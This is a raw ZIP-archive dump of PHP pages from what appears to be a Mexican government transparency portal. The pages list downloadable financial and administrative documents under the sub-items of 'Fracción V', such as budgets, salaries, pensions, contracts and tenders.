= ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[Z F5k.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso k)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso k) El contrato de prestación de servicios o por honorarios, y el gasto realizado por concepto de pago de asesorías</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/k/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[R4�`F F F5i.phpnu �[��� <?php function obtenerArchivos($ruta) { $archivos = []; if (is_dir($ruta)) { foreach (scandir($ruta) as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== '.' && $archivo !== '..' && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $archivos[] = [ 'nombre' => ucwords(str_replace(['-', '_'], ' ', pathinfo($archivo, PATHINFO_FILENAME))), 'ruta' => "$ruta/$archivo" ]; } } } return $archivos; } function generarPestanasPorAnio($basePath, $inicio, $fin) { echo "<div class='tabs'>"; for ($anio = $inicio; $anio <= $fin; $anio++) { $active = $anio === $inicio ? 'active' : ''; echo "<button class='tab-btn $active' data-tab='anio-$anio'>$anio</button>"; } echo "</div>"; for ($anio = $inicio; $anio <= $fin; $anio++) { $active = $anio === $inicio ? 'active' : ''; echo "<div class='tab-content $active' id='anio-$anio'> <table> <thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; $archivos = obtenerArchivos("$basePath/$anio"); if (count($archivos) === 0) { echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { foreach ($archivos as $archivo) { echo "<tr><td>" . htmlspecialchars($archivo['nombre']) . "</td><td><a href='" . $archivo['ruta'] . "' target='_blank'>Ver documento</a></td></tr>"; } } echo "</tbody></table></div>"; } } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso i)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1200px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } .tabs { margin-bottom: 10px; } .tab-btn { padding: 10px 20px; margin: 5px 5px 0 0; border: none; background-color: #e0e0e0; cursor: pointer; } .tab-btn.active { background-color: #2b3e5c; color: white; font-weight: bold; } .tab-content { display: none; } .tab-content.active { display: block; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso i) Los estados financieros mensuales</h2> <?php generarPestanasPorAnio("../Transparencia/Fraccion5/i", 2014, 2027); ?> <h2>Histórico</h2> <table> <thead><tr><th>Documento</th><th>Enlace</th></tr></thead> <tbody> <?php $archivosHistorico = obtenerArchivos("../Transparencia/Fraccion5/i/Historico"); if (count($archivosHistorico) === 0) { echo "<tr><td colspan='2'>No hay documentos disponibles en el histórico.</td></tr>"; } else { foreach ($archivosHistorico as $archivo) { echo "<tr><td>" . htmlspecialchars($archivo['nombre']) . "</td><td><a href='" . $archivo['ruta'] . "' target='_blank'>Ver documento</a></td></tr>"; } } ?> </tbody> </table> </main> <script> const tabs = document.querySelectorAll('.tab-btn'); const contents = document.querySelectorAll('.tab-content'); tabs.forEach(btn => { btn.addEventListener('click', () => { const tabGroup = btn.dataset.tab.split('-')[1]; document.querySelectorAll('.tab-btn').forEach(el => el.classList.remove('active')); document.querySelectorAll('.tab-content').forEach(el => el.classList.remove('active')); btn.classList.add('active'); document.getElementById(btn.dataset.tab).classList.add('active'); }); }); </script> </body> </html> PK C��[����� � F5n.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso n)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso n) Cuentas públicas, auditorías y demás informes de gestión financiera</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/n/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[�r�Y Y F5u.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso u)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso u) Los decretos y expedientes relativos a las expropiaciones que realicen por utilidad pública</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/u/", "Documentos disponibles"); ?> </main> </body> </html> PK C��[�4L� � F5b.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso b)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso b) Los ingresos extraordinarios recibidos por cualquier concepto...</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/b/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[Tc#t� � F5p.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso p)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso p) Información sobre concursos por invitación y licitaciones públicas</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/p/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[�1(u� � F5v.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso v)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso v) Las pólizas de los cheques expedidos</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/v/", "Documentos disponibles"); mostrarTablaDocumentos("../Transparencia/Fraccion5/v/antiguo/", "Documentos Antiguos"); ?> </main> </body> </html> PK C��[�U�� � F5a.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso a)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso a) Las partidas del Presupuesto de Egresos de la Federación y del Presupuesto de Egresos del Estado...</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/a/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[O �� � F5h.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso h)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso h) El listado de jubilados y pensionados y el monto que reciben</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/h/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[��� � F5r.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso r)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso r) Inventarios de bienes muebles e inmuebles</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/r/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[�!��� � F5o.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso o)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso o) Información sobre adjudicaciones directas en adquisiciones, obra pública, inversión y servicios</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/o/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[r�W W F5t.phpnu �[��� <?php function mostrarTablaDocumentos($ruta, $titulo) { echo "<h2>$titulo</h2>"; echo "<table><thead><tr><th>Documento</th><th>Enlace</th></tr></thead><tbody>"; if (is_dir($ruta)) { $archivos = scandir($ruta); $hay = false; foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr><td>" . htmlspecialchars($nombre_legible) . "</td><td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td></tr>"; $hay = true; } } if (!$hay) echo "<tr><td colspan='2'>No hay documentos disponibles.</td></tr>"; } else { echo "<tr><td colspan='2'>No se encontró la carpeta.</td></tr>"; } echo "</tbody></table>"; } ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <title>Fracción V - Inciso t)</title> <link rel="stylesheet" href="../menu.css"> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin: 20px 0; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso t) Las concesiones, licencias, permisos o autorizaciones otorgadas de los últimos tres años</h2> <?php mostrarTablaDocumentos("../Transparencia/Fraccion5/t/", "Documentos disponibles"); ?> </main> </body> </html> PK C��[��H� � F5j.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso j)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso j) Los gastos de comunicación social</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/j/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[rn5 F5f.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción V - Inciso f)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción V - Información financiera, patrimonial y administrativa</h1> <h2>Inciso f) Las remuneraciones mensuales por puesto, incluidas todas las prestaciones, estímulos o compensaciones</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion5/f/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc', 'xls', 'xlsx'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK C��[� M} } F5s.phpnu �[��� PK C��[�zP< < � F5w.phpnu �[��� PK C��[��>�� � ' F5y.phpnu �[��� PK C��[�k��5 5 $$ F5g.phpnu �[��� PK C��[#;R�� � �3 F5x.phpnu �[��� PK C��["��H� � �<